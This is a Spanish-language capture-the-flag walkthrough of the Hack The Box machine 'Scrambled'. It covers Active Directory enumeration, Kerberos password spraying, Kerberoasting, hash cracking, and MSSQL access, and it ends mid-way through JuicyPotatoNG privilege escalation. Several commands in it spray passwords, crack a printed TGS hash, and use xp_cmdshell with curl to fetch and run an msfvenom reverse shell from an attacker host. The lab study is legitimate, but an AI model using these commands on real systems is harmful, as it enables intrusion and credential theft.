# HTB - Scrambled
## Información General
* **Nombre de la Máquina: Scrambled**
* **IP de la Máquina:** 10.129.85.148
* **Sistema Operativo: Windows**
* **Dificultad: Medium**
* **Fecha de Publicación: 11 Jun 2022**
***
## Enumeration
### Ping para obtener ruta de retorno
Realizamos un ping a la máquina objetivo para verificar la conectividad y obtener información sobre la ruta utilizando la opción `-R` para incluir la ruta de retorno:
{% code title="Kali Linux Machine" %}
```bash
ping -c 1 10.129.85.148 -R
```
{% endcode %}
El valor de TTL (Time To Live) igual a 127 puede ser indicativo de que el sistema operativo de la máquina objetivo es Windows. El TTL es un valor en el campo de los paquetes IP que indica la duración que un paquete puede estar en una red antes de ser descartado. **Windows establece por defecto el valor de TTL de sus paquetes IP en 128**, que al pasar por un salto en la red se decrementa a 127.
### **Escaneo de puertos con Nmap**
Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la máquina objetivo. Utilizamos las opciones `-p-` para escanear todos los puertos, `--open` para mostrar solo los puertos abiertos, `-sS` para un escaneo de tipo TCP SYN, `--min-rate 5000` para establecer la velocidad mínima de paquetes y `-vvv` para un nivel de verbosidad alto. Además, utilizamos `-n` para desactivar la resolución de DNS, `-Pn` para no realizar el escaneo de ping, y `-oG allPorts` para guardar la salida en un archivo con formato Greppable para luego utilizar nuestra función extractPorts:
### **Escaneo detallado con Nmap**
Posteriormente, realizamos un escaneo más detallado de los puertos identificados utilizando la opción `-sCV` para detección de versiones y scripts de enumeración de servicios. Específicamente, indicamos los puertos a escanear con `-p __PORTS__` (reemplazando `__PORTS__` con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre `targeted`:
{% code title="Kali Linux Machine" %}
```bash
sudo nmap -sCV -pPORTS 10.129.85.148 -oN targeted
```
{% endcode %}
```
# Nmap 7.94SVN scan initiated Tue Apr 2 18:15:21 2024 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49699,49704,60649 -sCV -oN targeted 10.129.85.148
Nmap scan report for 10.129.85.148
Host is up (0.20s latency).
Bug in ms-sql-ntlm-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 22:15:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.85.148:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-02T21:44:08
|_Not valid after: 2054-04-02T21:44:08
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after: 2023-06-09T01:42:36
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
60649/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=4/2%Time=660C8380%P=x86_64-pc-linux-gnu%r(
SF:NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0
SF:\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORD
SF:ERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDER
SF:S_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNK
SF:NOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r
SF:\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(T
SF:LSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V
SF:1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Fou
SF:rOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMA
SF:ND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOW
SF:N_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"
SF:)%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDe
SF:sk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRA
SF:MBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,
SF:"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDE
SF:RS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")
SF:%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-04-02T22:18:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 2 18:18:50 2024 -- 1 IP address (1 host up) scanned in 208.81 seconds
```
### Modificando /etc/hosts
Para añadir la entrada "10.129.85.148 scrm.local" al archivo `/etc/hosts`, puedes usar el siguiente comando en la terminal:
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
echo "10.129.85.148 DC1.scrm.local scrm.local" | sudo tee -a /etc/hosts
```
{% endcode %}
### Username Bruteforce con Kerbrute
### Directory Bruteforce con Dirsearch
{% code title="Kali Linux Machine" %}
```bash
dirsearch -u scrm.local
```
{% endcode %}
### Analizando la pagina de scrm.local
```
http://scrm.local/supportrequest.html
http://scrm.local/newuser.html
http://scrm.local/salesorders.html
http://scrm.local/passwords.html
```
En passwords.html podemos ver que dice que la password to be the same as the username. Así que intentaré nuevamente con kerbrute para ver si la credencial que obtuve funciona.
### Password Bruteforce con Kerbrute
{% code title="Kali Linux Machine" %}
```bash
kerbrute passwordspray -d scrm.local --dc dc1.scrm.local users ksimpson
```
{% endcode %}
### Impacket
Ya tenemos un usuario valido, por lo que seguiremos con la enumeración con impacket
{% embed url="" %}
Partimos con `getTGT.py`
{% code title="Kali Linux Machine" %}
```bash
python3 getTGT.py scrm.local/ksimpson:ksimpson
```
{% endcode %}
```bash
export KRB5CCNAME=ksimpson.ccache
klist
```
{% hint style="info" %}
```bash
sudo apt-get install krb5-user
```
Si notas que no funciona klist, instala kerberos.
{% endhint %}
Lo siguiente es utilizar `GetUserSPNs.py`
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass
```
{% endcode %}
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass -request
```
{% endcode %}
{% code title="hash.txt" overflow="wrap" %}
```
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$05ba11933eb6ee366b244a4aa5faeb53$e35b1fe2314f990d3cff75cd40699be6b20df36fea2e9f15e798b57cf8777ead1ba18ec589a9052eac681dbffc8b8a7ecd81b108f5d9ba72e720356247556ef08cd784830cc0a7bbde00e1923b1886de69ed32f4d5ddac664eb055787089f5985d24cdd402969596215f35caf206a999c7648b7228bac182a5d32a90a1c003a85fe878c9eb801644ec1dbace86df05713a103fa3e153c4361f0bbc8b50e7cbf14391dc20985449a669cf2ac3a9a0c66a7248b9353a272a4db5c57764cbed74ce74fc7427d78f984b68a623336526bdd7695adf385a30d3ee3b2bc354ed92f36268b6b170ded9239d1b43fba70a01ed730bbb5e45000a5d6999cf7d9426ed704302372b4ecc6fd8e96343b128cdfaf0931b7545f0cd8439d78ef20eeea164eb2f86a390277024aa53b421a57e3a214caf63733dc73fa3195fea3ad117dce2dc6e6204b9885b7768af1cb2c1beed8cf0a06ccd71f2f9ae57c09fabbb9167c04e072a6ad3002fb08417cf8704847519b56a859b7ac8d51fc4d5b38608dc7c9aeef11f6e1c8751e3a1434e5b032a07ec5caa2703e0469fecbf75ecd0d8d6b4f197c06873b451ad5d2beb12e0c4a19dae3ce3bf47113e447793638c6445924ea69cec0e2a2d4c98a25575251494e056bab0c753746d0ff611f0391acea24756372a17632e4f8094166f4c01f1cd982179358dc70415195aec5e5bc628a4dd3a1662c62d8ae70218508c98b433362388ce7cf9dd0a787e6694cc08b9576b342929f3c7be2a633cd37cedb82c1649b0e93d1799789b2736c2dca7938b82ccbe4b272af5a5ef4c8b6a918c141152a3b953dc025e737c7d756cbad510e51a11d57148647b2cf5f2d314701758a1da79dd08ef6fddccaa999f7a4457831e552f762a90cd4e7456f685aed9e352dd77f528e0694b16136f06e5b29f9f5f8f60cb3b5e2bdd765b0af23cdf2a3c7f68578eb2b9efdf333eadf27def6e43a80474ee79dfd3ea7f42f9990b194f5b97ef6de67fa67d2ef542105a89b20e0f65b707d42151a40eaa14e5d350a3cb71d068e327c8f8d74af8aae5b192198daa723d4cbfeadb27dd311f3b36de412ba87b22ec96e6c35ed3b1b8a11412e34ec2b3cba7103a9f9c3250f8d7cbb10871a42483d2945458a7fbf8482652081dd8a7edd97f1d1c7ea9e3c21764ba2ea728c31c92e6a7d923873da8aa2180d999a973f1e6e1ee49d606f4e45184aabe5232427e986bd2906ee73173bf2862193f60e551c2e423e78495f5cf812b128fd8f6be5f354925add8d48234b868f7cfb56cf902d5cab2a6a92203547ff7e90260dcb461bd6dd1b1a5b5630e034e0ae63b26368852de50a413e9ffc6f0ee185a04289530c90a025f67b9214989dc2fc5a71f046f2fa84e4e06d8efee5bab82940517686e10df2fed6c5a2faa7ea103a3ce7b29453f3204
```
{% endcode %}
### John the ripper para crackear el hash
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
{% endcode %}
{% code title="\~/Scrambled/creds.txt" overflow="wrap" %}
```
ksimpson:ksimpson
sqlsvc:Pegasus60:MSSQLSvc/dc1.scrm.local
```
{% endcode %}
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
python3 mssqlclient.py dc1.scrm.local -k
```
{% endcode %}
Por lo que intentaremos todo de nuevo (desde `getTGT.py`) pero ahora con las credenciales `sqlsvc:Pegasus60.`
{% code title="Kali Linux Machine" %}
```bash
python3 getTGT.py scrm.local/sqlsvc:Pegasus60
export KRB5CCNAME=sqlsvc.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k
```
{% endcode %}
### NTLM Hash
Convertimos "Pegasus60" a NTLM Hash con alguna herramienta online (browserling.com/tools/ntlm-hash)
```
Pegasus60:b999a16500b87d17ec7f2e2a68778f05
```
Y la agregamos a nuestra lista de credenciales en creds.txt
### getPac.py
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
python3 getPac.py -targetUser Administrator scrm.local/ksimpson:ksimpson
```
{% endcode %}
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
export KRB5CCNAME=Administrator.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k
```
{% endcode %}
### Extracción de credencial en DB
```sql
SELECT name FROM sys.databases;
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
SELECT * FROM ScrambleHR.dbo.UserImport;
```
### MSFVenom Reverse Shell
{% code title="SQL Session" %}
```sql
xp_cmdshell curl 10.10.15.21:8888/3434.exe -o %temp%\3434.exe
xp_cmdshell %temp%\3434.exe
```
{% endcode %}
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3434 -f exe -o 3434.exe
python3 -m http.server 8888
```
{% endcode %}
{% code title="Kali Linux Machine" overflow="wrap" %}
```bash
nc -lvnp 7777
```
{% endcode %}
Entonces nos damos cuenta que el privilegio `SeImpersonatePrivilege` esta `Enabled`
Lo que quiere decir que podemos efectuar una escala de privilegios con **`JuicyPotatoNG`**
### Escala de privilegios con JuicyPotatoNG
{% @github-files/github-code-block %}
{% code title="Windows Machine" overflow="wrap" %}
```
cd %programdata%
curl 10.10.15.21:8888/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
```
{% endcode %}
{% code title="Kali Linux Machine" %}
```
python3 -m http.server 8888
```
{% endcode %}
Utilizaremos la shell Invoke-PowrShellTcpOneLine.ps1, la modificaremos (el LHOST y LPORT) y luego la dejaremos en base64. Para luego descargarla en la máquina Windows en %programdata%.
